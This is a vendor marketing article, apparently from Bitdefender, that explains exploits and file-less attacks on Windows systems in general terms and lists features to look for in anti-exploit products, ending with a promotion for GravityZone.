- All attacks include malicious activity, but not all attacks include writing malware to disk
- Anti-exploit technology prevents attackers from gaining a foothold
- What to look for in anti-exploit technology
Attacks, exploits and vulnerabilities
Any complete cloud workload security stack must feature robust anti-exploit technology for both end-user and server systems. Cloud workloads run on servers, either on-premises or in the cloud, and end-user systems access those workloads. End-user systems can give attackers indirect access to workload data, while servers can provide more direct access if attackers achieve a foothold.
When trying to gain access to a Windows system, attackers exploit vulnerabilities, known or unknown (zero day). The exploits may be novel, or part of a widely used exploit kit. The vulnerabilities attackers exploit may be within the Windows operating system or applications running on the system. The vulnerable component may run in kernel or user-mode, providing different levels of privilege to the attacker. Attackers may also string together attacks to elevate privilege locally once they have gained a remote foothold on a system, or they may move laterally by attacking other systems.
File-less attacks
Commonly, organizations believe the point of an attack is to place malware on a system. In the case of ransomware or cryptojacking, this is true, but it is not always true. In file-less attacks, the malicious activity occurs entirely in memory; no file is written to disk for traditional anti-virus solutions to detect. Instead, an attacker exploits a vulnerability then remotely runs commands on a system to either attack another system or exfiltrate sensitive data.
Detecting the signs of a successful attack is important.Endpoint Detection and Response and Managed Detection and Response solutions do just that; look for indicators of compromise and/or attack. However, anti-exploit technology aims to detect and block attacks early in the attack cycle — at the point when an attacker is attempting to exploit a vulnerability to gain initial access to a system.
What to look for in anti-exploit solutions
Part of a complete prevention and detection stack managed from a single console
- Point solutions have value, but tend to expand the impact of security when not included as part of a wider approach
- Look for a solution that encompasses multiple security techniques, from signatures to advanced machine learning and threat-hunting capabilities
Coverage of both kernel- and user-mode exploits of known and unknown vulnerabilities
- Detecting yesterday’s attacks is easy, preventing tomorrow’s attacks is difficult
- Look for a solution with advanced detection and mitigation that includes the full software stack in your environment
Applicable across on-premises and cloud, end-user and serve
- Adoption of hybrid-, multi-cloud has created complexity, which may lead to security costs
- Look for a solution that covers where your architecture is today, and will be tomorrow
Support for Virtual Desktop Infrastructure, including full-session, terminal services hosts and Remote Desktop Protocol
- Work-from-home won’t end any time soon
- Look for a solution which with minimal impact on performance and administration
While anti-exploit technology for Windows systems is not a panacea, it is a critical part of the security stack. Using focused, yet generic detection and mitigation techniques to prevent the abuse of common types of vulnerabilities will stop attacks before a foothold is gained. Attackers will continue to discover and exploit vulnerabilities in Windows systems, and the popular applications they run.
Bringing it all together
Hybrid-, multi-cloud environments give organizations tremendous flexibility in furthering business goals, but they also introduce complexity for security teams. Even after a zero-day vulnerability is exposed, teams struggle to quickly patch systems, especially servers. Security teams struggle to update controls while vendors attempt to identify new exploits and variants. This is where strong anti-exploit capabilities fill in the gaps by detecting and mitigating exploit attempts, stopping attacks from succeeding in the early stages of an attack.
Bitdefender GravityZone provides enhanced anti-exploit for Windows capabilities. Learn more and get your free trial here: https://www.bitdefender.com/business/enterprise-products/virtualization-security.html